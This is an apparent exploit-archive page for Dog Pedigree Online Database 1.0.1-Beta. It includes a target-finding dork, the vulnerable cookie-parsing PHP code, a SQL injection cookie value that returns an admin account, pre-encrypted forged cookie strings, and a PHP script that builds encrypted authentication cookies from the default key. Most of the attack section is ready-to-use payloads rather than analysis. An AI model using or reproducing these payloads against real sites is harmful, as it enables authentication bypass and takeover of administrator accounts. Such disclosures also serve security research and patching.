exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Dog Pedigree Online Database Insecure Cookie

Dog Pedigree Online Database Insecure Cookie
Posted May 20, 2009
Authored by YEnH4ckEr

Dog Pedigree Online Database version 1.0.1-Beta suffers from a SQL injection vulnerability in the way it handles cookies.

tags | exploit, sql injection
SHA-256 | ab0111ab9dde2b38de6df12c3525847b211dc0deb7f37f3fa72ba74221099b07

Dog Pedigree Online Database Insecure Cookie

Change Mirror Download
---------------------------------------------------------------------------------------
INSECURE COOKIE HANDLING VULNERABILITIES --Dog Pedigree Online Database v1.0.1-Beta-->
---------------------------------------------------------------------------------------

CMS INFORMATION:

-->WEB: http://thewhippetarchives.net/twa_is_offline.php
-->DOWNLOAD: http://sourceforge.net/projects/dogarchive
-->DEMO: N/A
-->CATEGORY: Genealogy
-->DESCRIPTION: This project allows to setup and maintain a database for
collecting (dog) pedigrees. The data will actually be collected...
-->RELEASED: 2009-01-25

CMS VULNERABILITY:

-->TESTED ON: firefox 3
-->DORK: inurl:"printable_pedigree.php"
-->CATEGORY: COOKIE AUTH-BYPASS (SQLi) / INSECURE COOKIE HANDLING
-->AFFECT VERSION: <= 1.0.1 Beta
-->Discovered Bug date: 2009-05-08
-->Reported Bug date: 2009-05-08
-->Fixed bug date: 2009-05-12
-->Info patch (v1.0.2): http://sourceforge.net/projects/dogarchive/
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)



#######
///////

INTRO:

///////
#######


Cookie name --> it could be configured, but any web change it.

Cookie protection --> Active by default, but some Webs use it and other neither (Because it needs php_mcrypt extension).

With cookie protection --> Any web change the $COOKIE_KEY value. Always by default



###########################
///////////////////////////

COOKIE AUTH-BYPASS (SQLi):

///////////////////////////
###########################


-----------
VULN FILE:
-----------


Path --> [HOME_PATH]/php_users/htdocs/
File --> users.php.inc
Vuln function --> init()


function init() {

...

$cookie = $_COOKIE[$USER_COOKIE];
if (isset($COOKIE_KEY)) {
$iv = mcrypt_create_iv(mcrypt_get_iv_size (MCRYPT_BLOWFISH, MCRYPT_MODE_ECB), MCRYPT_RAND);
$cookie = mcrypt_decrypt(MCRYPT_BLOWFISH, $COOKIE_KEY, base64_decode($cookie), MCRYPT_MODE_ECB, $iv);
}
$cookie = rtrim($cookie);
$a = split('&', $cookie);
$i = 0;
while ($i < count($a)) {
$b = split ('=', $a[$i]);
$key = urldecode($b[0]);
$value = urldecode($b[1]);
$this->{$key} = $value;
$i++;
}
$this->id = $this->{'uid'};
}

..

---------
EXPLOIT:
---------


1.-WITHOUT ENCRYPTION:


Add cookie --> Name ~> dogarchive_user_info

--> Value ~> email=&uid=-1%20or%201=1#&seclev=


2.-WITH ENCRYPTION:


Add cookie --> Name ~> dogarchive_user_info

--> Value ~> Ffq9xizFlqX%2FLFytv2XsUILuolhabq3%2BN5A0%2B3ifmNdjLEIqh%2BKIXA%3D%3D



Return --> Admin account.


##########################
//////////////////////////

INSECURE COOKIE HANDLING:

//////////////////////////
##########################


<<<<-------+++++++++ Condition: Search e-mail and uid (it's not difficult) ++++++++++--------->>>>


------
NOTE:
------


Use an cookie builder (need php_mcrypt extension)
to encrypt the cookie value:

<?php

//Configure [real_email] and [real_uid] with your target

$COOKIE_KEY="somethingRAndoM9871234whateveryoulike"; //user.conf by default
$cookie="email=".urlencode('[real_email]')."&uid=[real_uid]&seclev=1";
$iv = mcrypt_create_iv(mcrypt_get_iv_size (MCRYPT_BLOWFISH, MCRYPT_MODE_ECB), MCRYPT_RAND);
$cookie = base64_encode(mcrypt_encrypt (MCRYPT_BLOWFISH, $COOKIE_KEY, $cookie, MCRYPT_MODE_ECB, $iv));
print "Cookie crypted-urlencode -->".urlencode($cookie)."\n";

?>


-----
PoC:
-----


1.-WITHOUT ENCRYPTION:


Add cookie --> Name ~> dogarchive_user_info

--> Value ~> email=[real_email]&uid=[real_uid]&seclev=1


2.-WITH ENCRYPTION:


Add cookie --> Name ~> dogarchive_user_info

--> Value ~> Use PHP script above


---------
EXPLOIT:
---------


1.-WITHOUT ENCRYPTION:


Add cookie --> Name ~> dogarchive_user_info

--> Value ~> email=y3nh4ck3r@gmail.com&uid=2422&seclev=1


2.-WITH ENCRYPTION:


Add cookie --> Name ~> dogarchive_user_info

--> Value ~> 7O%2By0gnSt4KItondpdwQThDciQY6aR3QfFGEvZQzUGQWNkYwIUI4lfiZ1WQgnEc%2B



#######################################################################
#######################################################################
##*******************************************************************##
## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray ... ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: SPANISH H4ck3Rs community! ##
##*******************************************************************##
#######################################################################
#######################################################################
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close